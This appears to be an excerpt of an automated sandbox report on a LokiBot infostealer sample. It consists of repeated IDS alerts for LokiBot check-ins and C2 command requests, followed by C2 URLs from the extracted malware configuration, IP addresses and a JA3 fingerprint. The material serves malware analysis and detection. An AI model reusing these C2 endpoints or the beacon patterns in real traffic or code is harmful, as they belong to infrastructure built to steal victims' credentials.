                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49222 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49223 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49224 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49225 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49226 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49227 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49228 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49229 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49230 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49231 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49232 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49233 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49234 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49235 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49236 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49237 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49238 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49239 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49240 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49241 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49242 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49243 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49244 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49245 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49246 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49247 -> 188.114.97.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49248 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49249 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49250 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49251 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49252 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49253 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49254 -> 188.114.96.9:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49255 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49256 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49257 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49258 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49259 -> 188.114.97.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49260 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49261 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 188.114.96.3:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49262 -> 188.114.96.3:80
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: rocheholding.top/evie3/five/fre.php
                  Source: Joe Sandbox ViewIP Address: 188.114.96.9 188.114.96.9
                  Source: Joe Sandbox ViewIP Address: 188.114.96.9 188.114.96.9
                  Source: Joe Sandbox ViewIP Address: 104.21.74.191 104.21.74.191
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
